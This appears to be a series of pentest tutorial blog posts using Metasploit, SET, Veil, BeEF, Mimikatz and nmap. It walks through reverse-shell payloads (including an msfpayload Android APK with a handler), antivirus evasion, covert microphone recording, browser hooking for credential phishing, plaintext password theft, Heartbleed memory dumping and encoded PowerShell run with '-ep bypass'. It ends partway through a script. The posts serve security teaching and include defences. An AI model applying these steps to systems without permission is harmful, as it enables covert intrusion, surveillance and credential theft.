Java released an out-of-band patch yesterday to remedy two Zero-Day exploits. If you haven’t done so update now. The Java exploit code has been added to several underground crimeware kits rapidly accelerating its spread on the internet. The patch stops a remote exploit that would allow an attacker to run code on a system that does nothing more than browse to a malicious page. This could include a full remote shell which we will demonstrate below.

The exploit code has been publicly available for a while now and has been added to the ever popular security testing suite Metaslpoit. We will demonstrate the exploit using Backtrack 5 and the Social Engineering Toolkit.

Simply choose the “Java Applet JMX Remote Code Execution” template from the SET Browser Exploitation menu.

Then choose the type of shell you want to use. We just selected the Reverse Meterpreter Shell and chose the defaults for everything else.

Once SET is ready, it will execute Meterpreter and wait for an incoming connection. Now we just need to surf to the attacker machine from Windows:

It doesn’t seem that anything happens. No warnings or pop-ups.

But as you can see below, our Backtrack system has already sent the exploit code and created a remote session with the system:

We can now view any sessions that were created. As you see below we have one active session by Fred using a computer called Freds-PC using IP Address 192.168.0.114.

We simply connect to the session with the “sessions -i” command and run “shell” to open a full remote DOS shell:

In the example above all the user did was browse to a malicious webpage. With no warning at all a full remote shell was opened on the visiting system by an attacker.

Now, let’s go to the Java Download page and download the latest update (update 11):

Then let it install:

Finally, let’s try surfing to the same malicious site again from our Windows 7 system and see what happens.

The webpage opens and acts like it did on the victim’s side. So far no change.

But if we look at the attacker side, we get an error message and more importantly no remote shell is opened:

That’s it! One Java update takes care of one of the nastiest Java exploits I have seen in a while.

Java seems to be a favorite target of hackers, and you never know when another Zero-Day might be discovered. If you haven’t done so all ready I highly recommend downloading and using a script blocking program like NoScript to give you some extra security and control over what scripts are allowed to run.

Technology has made some amazing advances in the past few years. It makes you wonder what computer security will look like in the future. For example, how cool would it be to be able to remotely turn on a microphone, and record what it said. Then process the recorded speech – turning it into searchable text, and scanning it to look for keywords like “Password” or “Social Security Number”?

What if I said you can do that right now?

Well, you can!

Thanks to some amazing work by AT&T labs and “Sinn3r” from the Metasploit development team, you can now take any .wav file that contains spoken words, and search it for keywords like account information and passwords.

AT&T labs has opened up their “Watson” speech to text technology to the public, releasing a development SDK and API so programmers can add speech recognition to their products. With a proof of concept script written by Sinn3r from Rapid7, you can now add speech to text capability to Metasploit!

How does it work?

Amazing!

I will cover it in deeper detail in a following post, but here is a quick walk through:

I had a “target” system attach to my “attacker” Backtrack 5r3 box running a Java exploit. Once the target Windows 7 system (fully patched and updated of course, with AV protection enabled) ran the backdoored Java, I had an open session with it:

Next, I simply ran the “record_mic” command to remotely turn on and capture any audio within the area of the target system:

Finally, I simply fed the resulting .wav file into the sound analyzer script. It converted the sound file to text and searched it for keywords.

Did it find anything?

Of course! It correctly scanned the file and noticed that the word “password” was mentioned:

Okay, it wasn’t 100% correct. I used a four number password, followed by a dash and four more numbers. As you can see, the AT&T program mistook it and tagged it as a phone number, dropping the first number off. I also said “secured” instead of “picture” at the beginning of the line.

AT&T tagged the transcription confidence level at .48, this means that the program was about 50% confident that it had the right translation, which was about correct.

Even so, this technology is AMAZING! You have to think, during the process a voice was copied live from a remote system, turned into text and then analyzed for keywords. Without any “voice training” like so many voice programs need, Watson pretty accurately deciphered the .wav file and gave us a useable output.

We will take a much closer look at this in the next few posts. There were a few hurdles to overcome getting the script to run on Backtrack 5r3, so I will create a step by step tutorial. We will even look at some other uses for the technology.

Awesome job AT&T, Sinn3r and the Metasploit development team!

Okay, I introduced the cool capability of using Metasploit to capture remote voice via mic and then converting it into keyword searchable text in the last post. As promised, we will take a closer look at setting it up to work on Backtrack 5r3 in this post.

I am going to warn you up front, this can be quite a process, but well worth it.

In this tutorial we will be using a Windows 7 laptop as our target, Backtrack 5r3 as our “attacker” system, the Social Engineering Toolkit (SET), Metasploit, AT&T’s voice to text developer platform, and a proof of concept AT&T interface script by Metasploit developer Sinn3r.

Getting a .Wav file from Remote Mic

First thing your going to need is a remote shell. I have covered this A LOT on this blog, so I won’t spend time on it here. In this instance, I just used the Social Engineering Toolkit (SET) to create a Java based backdoor session to the Windows 7 Laptop:

Just connect to the session by typing “session -i 1″ and then type “record_mic” at the Meterpreter prompt. This will turn on the remote mic and record any sound and save it as a .wav file on the Backtrack 5 system.

Okay, let me stop right here for a minute. When you run “record_it” for some odd reason it only records 1-3 seconds of audio. Not really a lot of time to get anything useful from it.

(NOTE: You can use the post module “record_mic” mentioned in sinn3r’s article if you would like. I just found that running the built in script one is easier. And yes, they are a bit different, even though the name is the same.)

So, one thing we need to do is change the “record_mic” script so it will provide us some useful length .wav files.

It took me a while to find the actual “record_mic” script. The problem was that it isn’t in its own file, but included in the STDAPI webcam.rb script file!

The easiest way to find it is to perform a drive search for the file: “webcam.rb”.

It should find several, we are looking for the one in the STDAPI directory. Once you find it, edit the file and look for the following section:

As you can see, here is our problem. The recording duration is set to one second! Change this to something more reasonable and save it.

I chose 20 seconds on mine:

Okay, now when we run “record_mic” we will get 20 seconds of recording time instead of a whole one second.

Much better!

Because we used SET to create the backdoor, it will save any .wav file to the “Program Junk” directory as seen below:

We now have a sound recording from the target laptop. That is actually all we need from the target system.

Setting up the AT&T Program Interface

The next thing we need to do is feed that .wav file into AT&T’s Speech to text system. So, let’s take a look at getting Sinn3r’s program interface to work on Backtrack 5.

If you haven’t done so already, grab Sinn3r’s proof-of-concept program from the link on the Metasploit article page. You will need a couple things to get the program to work right:

1. You need to sign up for the AT&T Developer’s Free Trial
2. AT&T will give you an API and Secret key you will need these later.
3. You need to install ffmpeg to convert the Metasploit .wav files into AT&T readable files.
4. You will also need Ruby Gems “att_speech” module
5. and Ruby 1.9.3 installed

I’ll let you figure out steps one and two, they should be self explanatory.

For step three just install ffmpeg by typing, ‘apt-get install ffmpeg.’

Steps four and five can be a pain.

When you download the Gems “att_speech” module and try to install it by typing “gem install att_speech” command you are probably going to get this error in BT5r3:

You need Ruby 1.9.2 or greater installed. That is really odd, as you most likely already do.

If you type “update-alternatives –config ruby” you will see all the Ruby installed versions as below:

Well, looky there, we HAVE 1.9.2 installed!

What to do?

I got around this by installing Ruby 1.9.3. To do it the easy way, I just installed RVM:

(Note: I followed step 1 from this website to get RVM installed.)

Now that we have Ruby 1.9.3 installed, let’s try “gem install att_speech” again:

Tada!

Almost done now!

Okay, if we have Sinn3r’s script, Ruby updated and ffmpeg installed, we should be all set.

Well, not quite. If you are running on OSx, the script will buzz right through and work great. On Linux, not so much. There are a couple more changes we need to make.

First set ffmpeg as the audio decoder and then remove the .tmp extensions in the code or it will confuse the poor ffmpeg program. I’ll make it easy for you, just open Sinn3r’s script, find the ffmpeg section and make it look like this:

Now we are ready!

Running the AT&T API Script

Now we need to execute the script, don’t forget to point it at the directory that contains the “record_mic” .wav files, give it an output directory to store converted files in and most importantly, put in your AT&T provided API and secret numbers:

Ruby ./d3v_wav_analyze.rb -i ~/.msf4/loot/ -o /tmp -a [API_KEY] -s [SECRET_KEY]

When run it will look something like this:

As you can see it worked!

Here is a closeup of the voice that was captured remotely from the mic, turned into text and keyword searched by the AT&T system, looking for the keyword – “Password”:

Okay, I must confess, the process isn’t perfect…

I said, “open secured file, password is 7743-9824…” and it translated it to “Open picture file, password is”

You will also notice that the AT&T program thought the password was a phone number, so it tagged it as a PHONE variable, dropping the first number.

Was it perfect no…

And the cool thing is that it knows it wasn’t perfect in the translation. Notice the confidence rate: .480…

Basically it knew that it only got about 50% of the translation right. But when you think that Metasploit grabbed the voice from a remote laptop, converted it to a wav file, uploaded it to AT&T’s voice recognition software that converted it to searchable text, and correctly found that I said “password” – That is amazing!

I’ve had mixed results with the translations, one as low as 11%. But if you look at the Metasploit article, when Sinn3r tried it he got up to a 95% translation rate!

Pretty amazing stuff, and I am sure it will only get better. Hopefully you can see how this could be used to do other security related things. I can already think of another pretty sweet idea how this could be used and will hopefully get another tutorial up by the end of this week or next… If it works, lol!

Sorry about the length of this tutorial. But in all things in Security, nothing is perfect and I wanted to save you a ton of time by explaining the workarounds for the snags that I encountered when trying to get it to run on Backtrack 5.

I hope it works well for you and you enjoy it!

(For securing against this type of attack, don’t let your users run Java! Also, disable the webcam and microphone on your system if they are not needed!)

Earlier this month Nginx disclosed that there was a buffer exploit vulnerability in some versions of their product. Recently, Metasploit released an exploit module for the vulnerability.

Nginx, the ever popular opensource HTTP Server and Proxy publicly disclosed that a Buffer Overflow was discovered in versions 1.3.9 – 1.4.0. According to Shodan there are almost 3 million servers on the web that use Nginx with almost 12,000 running the affected versions.

A notification from Nginx stated that a specially crafted request could trigger a stack-based buffer overflow:

The exploit released by Metasploit can take advantage of the overflow to run a payload that could include a remote shell:

This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.

The issue has been fixed in Nginx 1.4.1 & 1.5.0 and a patch is available (see Nginx announcement above).

Many people think that if they are running an Anti-Virus and a firewall, that they are generally safe from hacker attacks. But the truth is far from that. Meet “Veil” a remote shell payload generator that can bypass most current Anti-Virus programs.

Many Anti-Virus programs work by pattern or signature matching. If a program looks like malware that it has been programed to look for it catches it. If the malicious file has a signature that AV has not seen before, many will dutifully say that the file is clean and not a threat.

If you can change or mask the signature of malware, or a remote shell in this case, then most likely AV will allow it to run and the attacker gets a remote connection to the system.

Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that. It takes a standard Metasploit payload and through a menu driven program allows you to create 21 different payloads that most likely will bypass anti-virus.

But how well does it work?

Following the directions on Chris’s page, I downloaded and installed Veil on my Kali (Backtrack) system.

Simply pick what payload you want:

Then you can choose to use Metasploit’s standard msvenom shellcode or choose your own. I just chose the default, msfvenom:

Next choose the type of payload, I just chose reverse TCP. Then enter the IP address of the Kali system and the port you want to use:

Veil will then create the payload and present you with two options. You can feed the payload into Pyinstaller or Py2Exe to create a Windows executable file.

This is where I got a bit stuck. For some reason Pyinstaller did not want to co-operate on my Kali machine. Fussed with it for a while, then just followed Chris’s instructions for creating the .exe file on a Windows machine and it worked without a hitch.

Basically install Python, Py2exe, and PyCrypto on Windows (all in the same directory). Then just copy over your created payload.py file, the RunMe.bat file and setup.py (found in your Kali Veil directory), into your Windows Python Directory.

Run the Bat file and sit back and watch the magic. When it is done you will have a payload.exe file. Any Windows system that runs it will try to connect out to the Kali system.

Finally start a Metasploit payload handler on your Kali system so the remote shell can connect to you. In Kali at a terminal prompt, type “msfconsole” and then:

Make sure you use the same IP address as LHOST and port as LPORT that you used in creating the payload.

Now, when a Windows system runs the payload.exe file we get this:

A remote session.

Then if we type “shell”:

This was a fully updated Windows 7 system with a very good Anti-Virus installed and updated with an intrusion detection system running. It didn’t see a thing.

This should prove that you can not trust in your Firewall and AV alone to protect you from online threats. Unfortunately many times your network security depends on your users and what they allow to run. Instruct your users to never run any programs or open any files that they get in an unsolicited e-mail.

Blocking certain file types from entering or leaving your network is also a good idea.

And finally, using a Network Security Monitoring system will help track down what happened and what was compromised if the worst does happen.

For more information on Veil, and other pentesting topics, check out Chris’s training session at Blackhat USA 2013!

The Recon-NG Framework is a powerful tool that allows you to perform automated information gathering and network reconnaissance. Think of it as Metasploit for information collection.

Recon-NG automates a lot of the steps that are taken in the initial process of a penetration test. It has numerous features that allow you to collect user information for social engineering attacks, and network information for network mapping and much more.

You can automatically hit numerous websites to gather passive information on your target and even actively probe the target itself for data.

Anyone who is familiar with Metasploit will feel right at home as the interface was made to have the same look and feel. The command use and functions are very similar. Basically you can use Recon-NG to gather info on your target, then attack it with Metasploit.

INSTALLING RECON-NG

To install Recon-NG, simply download the program from the Recon-ng repository:

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Then surf to the Recon-ng directory:

cd /recon_ng

and run the program:

./recon-ng.py

Typing ‘help’ will bring up a list of commands:

Now, like Metasploit, you can type ‘show modules’ to display a list of available modules.

Some of the modules are passive, they never touch the target network, while some directly probe and can even attack the system you are interested in.

One tactic used to passively probe network structure is to use the Google search engine to enumerate site sub-domains. You know that there will be a http://www.some_target_name.com but what other subdomains are out there?

You can do a Google search for subdomains using the site: and inurl: switches. Then remove sub-domains (-inurl) that you find so other subdomains will appear. This can take a while to do by hand and can require a lot of typing if the target has a large number of sub-domains.

Recon-NG will do this for you automatically and record what it finds in a database.

Just use the ‘recon/hosts/gather/http/web/google_site’ module. Then ‘show options’ to see what the module requires. This one only requires a target domain.

As in Metasploit just type ‘set domain targetname.com‘. Then just type ‘run‘ and the module will execute as seen below:

As you can see from the screenshot Recon-NG is enumerating the sub-domains for Microsoft. Within seconds, several of the sub-domains are listed.

All the data collected by Recon-NG is placed in a database. You can create a report to view the data collected. Just type in ‘back‘ to get out of the current module. and then ‘show modules‘ again. Simply use one of the report modules to automatically create a nice report of the data that you have obtained.

Here is a sample of the HTML report:

Sub-domain enumeration is only one module you can run, there are many others to choose from. There are also some that require a program API key like Twitter, Shodan, LinkedIn or Google. Using these you can get specific information from the corresponding sites about your targets.

For example you can search Twitter for tweets from your target or even check Shodan for open systems.

I have just briefly touched on some of the capabilities of Recon-NG. It is really an impressive tool that is well worth checking into.

For more information check out the Recon-NG Wiki page!

The internet can be a very unfriendly place, especially for older operating systems like Windows XP. In this post we will take a look at exploiting Windows XP browsers using BeEF, the Browser Exploitation Framework.

It has been a long time since I have done a post on BeEF, about three years in fact, but after going through a great Web Application and XSS security class, I figured it was time to brush it off again. I was very pleased to find that a ton of new features (called commands) have been added to BeEF since I last used it, dramatically increasing its functionality.

Granted a lot of the attacks in BeEF no longer work against Windows 7 with the latest browsers, but it seems that Windows XP systems are still very vulnerable to many of the browser attacks, even when using the latest browsers.

So let’s see what BeEF can do against a Windows XP system.

First we need to start the Exploitation Framework. In Kali, just open a terminal and type:

This starts the BeEF server and shows you the web address to open the graphical user interface and a couple sample pages that you can use to hook browsers:

Just surf to 127.0.0.1:3000/ui/panel to view the user interface and login with the username and password of ‘beef’:

You will now be greeted with the BeEF control panel:

Listed under the “Getting Started” section you will see links for two test pages that you can use to play with hooking browsers. I like the “Advanced version” as it looks like a real webpage.

On our XP system running the latest Firefox browser, if we surf to the “Malicious” demo page that BeEF creates, we will see this screen:

Or this if we are using Chrome:

The page shows some delicious looking beef, and nothing really seems awry. But what the user can’t tell, is that this particular webpage contained a hook. A malicious program that allows an attacker to hook the browser and, well, pretty much take over complete control of the browser.

As soon as the visitor simply visits the page, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.

When machines are hooked, they show up in the BeEF control panel:

Now that we have the system listed in the control panel, we simply click on the system we want to attack and then pick from the numerous attacks listed in the commands section:

Using these commands we can grab information from the victim’s browser, or even change what they see. For example, if we want to try to Social Engineer them and grab their Facebook credentials we can go to the Social Engineering tab and click “Pretty Theft”.  And then ‘Execute’.

On the victim’s browser a pop up will appear:

Oh no! My Facebook timed out!

If the user fills in their creds and hits Log in, this appears in the BeEF control panel:

Or we could try to grab credit card numbers with this Amazon looking attack:

BeEF can do much more than just send pop-ups. You can grab the HTML of the webpage that the victim is on:

And then change any links on the page in realtime, without the user ever knowing, to point to wherever  you want the victim to go. Here is a look at the webpage source after changing all the links on the page to point to the Dallas Cowboys website:

Of course an attacker wouldn’t normally send them to a sports site, but most likely a website that was, say, a complete spoof of Amazon or Facebook.

You can also send custom Javascript, or even tie it in with Metasploit to attempt to get a remote shell.

As you can see, an attacker having control over the browser can be very bad.

The attacks are color coded as to the chance that they might work. But I did notice that some attacks that were marked red did in fact work, while some marked green did not.

I also noticed that newer browsers seemed to stop some of the attacks, but XP was still pretty open as to what would work against it.

I tried these attacks against a Windows 7 system and nothing was displayed:

A hook was created, but only lasted for about a second or two before it was dropped.

The best mitigation against this type of attack is to use the latest Windows OS and browser versions. If you can, update or replace your Windows XP systems, especially if they are used online. The base security in Windows 7 and 8 is much better than WinXP. Finally always run a script blocker like “NoScript”, and don’t click on or open links and attachments in unsolicited email and social media messages.

One day I was monitoring a system for network traffic and noticed that an SSDP service was communicating out from the machine to the IP4 and IPv6 broadcast ranges. Kind of odd, as the machine was firewalled and should not have been communicating with anything at that individual time.

So what was it?

SSDP (Simple Service Discovery Protocol) is a protocol that advertises and looks for network services. On Windows systems, SSDP service controls communication for the Universal Plug and Play feature (uPnP).

Well uPnP has not been without it’s issues and earlier this year HD Moore of Rapid7 created a utility that would both scan for SSDP communication and notify you if the system was vulnerable to uPnP exploits.

What is interesting about the “UPnP SSDP M-SEARCH Information Discovery” is that it not only tells you if the machine is vulnerable to uPnP exploits, but also returns interesting information about  the machine.

So if the system isn’t vulnerable, chances are that you will at least be able to tell that:

• It is up and running
• The service that is running
• And a valid user name!

The search tool is already included in Metasploit. So all you need to do is run it and feed it a network range:

Then type “run” or “exploit” and it will scan the network range looking systems advertising uPnP services:

Okay, it found one. It doesn’t appear to be vulnerable, if it were the uPnP vulnerabilities would be listed with the return.

But if you notice there is an html link. In this case, if we click the link, we are presented with a bunch of information that includes the machine name and a valid user name!

As you can see from the scan results above, the Media Server was running on this machine, and a valid PC name and username is listed (blocked out to protect the innocent).

For security departments, running this utility against your company will quickly show any services that are being openly broadcasted on your net. If these services are reachable from the internet (over 40 million are!) then you have some serious configuration issues that need to be addressed.

I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peak at what type of material will be in the book.

Mimikatz, created by our friend Gentil Kiwi, is a great password recovery tool. It is able to recovery passwords from several Windows processes in PLAIN TEXT.

Not to long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account and we used the Bypass UAC module to bump our access up to System level. (Explained in the book)

Now we just need to load in the mimikatz module. There is a 32 and 64 bit module, choose accordingly. For this demo we will be using the 32 bit.

1. At the Meterpreter prompt, type “load mimikatz”.
2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

The help is pretty self-explanatory; basically type the corresponding command to the creds that you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt. Or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources – Windows Login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

1. Type “msv”.

And there you go – a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

1. Type “Kerberos”.

If you look at our user Ralf, you will see his password in plain text!

And that is it, after we get a remote session with Metasploit and using Mimikatz, recovering clear text passwords is just a few commands away.

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port address also if you would like.

Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

• user exploit/multi/handler
• set payload android/meterpreter/reverse_tcp
• set lhost 192.168.1.16 (enter your Kali IP address)
• set lport 4444

Then just type exploit to start the handler:

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

9. You can see the processes running by typing, “ps”:

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:

Pretty amazing stuff!

Want to learn a lot more about Kali and Metasploit? Check out “Basic Security Testing with Kali Linux“.

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

5. Finally, type “exploit”:

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Now just connect to the session using “sessions -i 1″:

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

You can now quickly detect the OpenSSL-Heartbleed vulnerability very quickly on a network using the ever popular nmap command, and with the latest modules from Metasploit you can quickly see the exploit in action.

For this tutorial I will be using a WordPress server and Kali Linux running in two separate VMWare virtual machines.

For a vulnerable server, I used one of Turnkey Linux WordPress VMs.  There are security updates available for Turnkey’s WordPress, but during the VM setup, and for this tutorial, I purposefully told the VM NOT to install the security updates so I could test for the OpenSSL vulnerability.

Once the WordPress VM was configured (just answer a few simple questions) I then fired up my Kali Linux VM.

Nmap has created a Heartbleed script that does a great job of detecting vulnerable servers. The script may not be available in your version of Kali, so you may have to manually install it.

Detecting Exploit with Nmap

If the Open-Heartbleed script is not already included in your nmap install, you will need to manually install it.

This is pretty easy, just visit the OpenSSL-Heartbleed nmap Script page, copy and save the nmap nse script file to your nmap “scripts” directory as seen below:

You will also need the nmap “tls.lua” library file, save this to the nmap “nselib” directory as seen below:

That is it, we can now use the heartbleed script in nmap to detect vulnerable systems.

To use the command the syntax is:

nmap -sV --script=ssl-heartbleed <target>

All we need to plug in is the IP address of our target test WordPress site, 192.168.1.70 in this instance:

And if the target machine is vulnerable we will see this:

State: VULNERABLE
Risk Factor: High

Exploiting with Metasploit

Now that we know we have a vulnerable server, we can use the latest Metasploit OpenSSL-Heartbleed module to exploit it. (Note: you can use the module to detect vulnerable systems also)

Update metasploit to get the latest modules. Just type “msfupdate” at a Kali command prompt:

Now run “msfconsole” to start Metasploit and you will be presented with the Metasploit console:

Next search for the heartbleed modules:

Notice there are two, we will just be using the scanner.

Type, “use auxiliary/scanner/ssl/openssl_heartbleed“:

We are just going to set two options, “set VERBOSE” to true and we need to “set RHOSTS” to our target IP address as seen below:

And finally, just “run” the exploit:

If you click on the picture above, you will see that Metasploit communicated with the server and was able to pull random data from the server’s memory.

The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this. But the danger is in the fact that it could display sensitive data.

Thus the best practice (if you haven’t already) is to check your systems for the heartbleed vulnerability and patch them immediately. After the systems are patched change any passwords on the effected machines.

As always, never run security scans or checks on systems that you do not own or have approval to scan.

If you enjoyed this tutorial and want to learn more about Kali Linux and Metasploit, check out my latest book on Amazon, “Basic Security Testing with Kali Linux“.

You have a remote shell to a Windows box in Metasploit, very cool, but what can you do? Granted Metasploit is loaded with features, options and tons of post modules (which are all amazing by the way), but what if you want to do something a bit more custom? Say, like adding custom pop-ups and even voice, but you have no clue about programming in Ruby.

How about PowerShell?

Let me start this out by saying I am no programmer. Sure I have futzed around with various languages over the years, and even supervised programmers at a couple jobs – but trust me, I am not a programmer. Secondly, I never would have been able to do this without one of the Metasploit gods – Mubix over at Room362.com. Thanks Mubix!

Talking with a friend about exploit capabilities, we came up the thought that wouldn’t it be cool if when a machine was exploited during a red team pentest, if it would pop up a Windows error message on the screen saying, “Knock, Knock Neo.” You know, from the Matrix movie.

And wouldn’t it be cool if you could get the computer to speak to said victim in a woman’s voice saying the same thing? What if, as long as we are custom creating our Matrix-ish payload, we also wanted to pop up a picture on the target system of the green text filled Matrix screen? I mean wouldn’t that be cool too?

Well, with PowerShell, you can!

If you look at Mubix’s “Powershell Popups + Capture” article, you can see the step-by-step process that we will follow.

Create a text file containing the Powershell commands, I used something like this:

$shell = New-Object -ComObject “Shell.Application”;
$shell.minimizeall();
Start-Sleep -s 2;
[System.Reflection.Assembly]::LoadWithPartialName(“System.Windows.Forms”);
[System.Windows.Forms.MessageBox]::Show(“Knock, knock, Neo.” , “Status” , 2);
(New-Object –ComObject SAPI.SPVoice).Speak(“Knock, Knock Knee Oh, the Matrix has you!”);
c:\test\matrix.jpg;

The first two lines allow the script to clear the user’s screen by minimizing all open windows. We then pause the script for a couple seconds for dramatic effect. The next two lines pop up a Windows (Abort, Retry, Ignore) message box with the movie message, “Knock, Knock Neo.”

Once the user clicks on one of the message box buttons, the script calls the Windows built in text to speech capabilities to audibly speak the same message out of their speakers. Sometimes the words don’t come out exactly like they should so you need to help the Windows voice API by using slightly different, but similar sounding words (ex. “Knee Oh” instead of “Neo”).

The final command opens a Matrix .jpg file that we would need to have already uploaded to the system via the Meterpreter upload command. (Pick a big one that fills the screen!)

We need to take the text file and encode it as Mubix’s site shows:

Then run the following command in our remote shell, adding in the encoded text stream above:

powershell -ep bypass -enc <Paste in the Encoded Text>

And that is it!

One more step that would make this even more creepy (or visually convincing in a red team pentest) would be to use Meterpreter’s built in webcam capability to first snap a picture of the remote user at his computer, upload that picture to their system in place of the matrix.jpg, and then run the command for a more personalized message from “the Matrix”!

Best defense against these types of attacks is to never, ever open or run unexpected files or attachments in e-mails. Never use a USB drive that you find laying around your company. Avoid public Wi-Fi when possible. Finally, always use a script blocking program on your internet browser.

About three years ago computer workstations at two Iranian nuclear facilities allegedly began playing AC/DC’s Thunderstruck at random times and at full volume. How cool would it be to use this during your next computer security pentest?

Well, you can!

In this tutorial we will see how to recreate this cool attack with PowerShell and use it with Metasploit in Kali Linux.

But first some disclaimers:

Unless you are in an American or allied cyber unit, trying to infect a foreign nation’s nuclear computers is pretty much a no,no – so don’t do it. Actually using this against any systems that you do not have express written permission to do so will probably end you up in jail – so again, don’t do it. Lastly, this is not new, it is from a PowerShell script that is about 2 years old.

In this tutorial we will be borrowing the PowerShell code to play AC/DC’s hit song at full volume from a botnet script written by Christopher “@obscuresec” Campbel. If you did not see his 2013 Shmoocon talk, “Building a PowerShell Bot”, check this out:

The code can be found at his Github site.

We will also be using a technique by Mubix to encode the PowerShell script so we can deliver it via Meterpreter.

Lastly we will need a willing Windows 7 system as a target, this attack did not seem to work very well using a VMware virtual machine for a target (the up volume loop seems to bog systems down pretty good), so I used a stand alone system.

Playing “Thunderstruck” on a remote system:

1. From obscuresec’s botnet code, grab the Thunderstruck section:

[string] $VideoURL = “http://www.youtube.com/watch?v=v2AC41dglnM&#8221;
#Create hidden IE Com Object
$IEComObject = New-Object -com “InternetExplorer.Application”
